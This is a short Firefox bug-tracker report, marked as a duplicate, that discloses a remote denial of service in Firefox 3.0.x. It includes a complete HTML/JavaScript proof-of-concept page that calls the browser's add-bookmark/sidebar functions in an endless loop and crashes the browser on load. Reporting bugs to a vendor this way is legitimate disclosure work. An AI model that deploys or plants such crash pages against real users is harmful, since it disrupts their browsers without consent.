Closed
Bug 458649
Opened 16 years ago
Closed 16 years ago
Firefox 3.0.1/3.0.3 Remote DoS
Categories
(Firefox :: General, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 301424
People
(Reporter: lordshinchan, Unassigned)
References
()
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
A Remote DoS in Firefox 3.0.1/3.0.3 that will cause Firefox to crash on page load. Here is the script that will cause this.
rdos.html:
<html>
<title>Mozilla Firefox RDoS</Title>
<head>
<body>
<script type="text/javascript">
function romania()
{
title="****";
url="http://www.google.com/";
if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}
else if( window.external )
{
window.external.AddFavorite( url, title);
}
else if(window.opera && window.print)
{
return (true);
}
}
for (i=0; i<i+1; i++)
romania();
</script>
</body>
</head>
</html>
Reproducible: Always
Steps to Reproduce:
1. Just reload the page.
Actual Results:
Firefox crashed.
Updated•16 years ago
|
Status: UNCONFIRMED → RESOLVED
Closed: 16 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•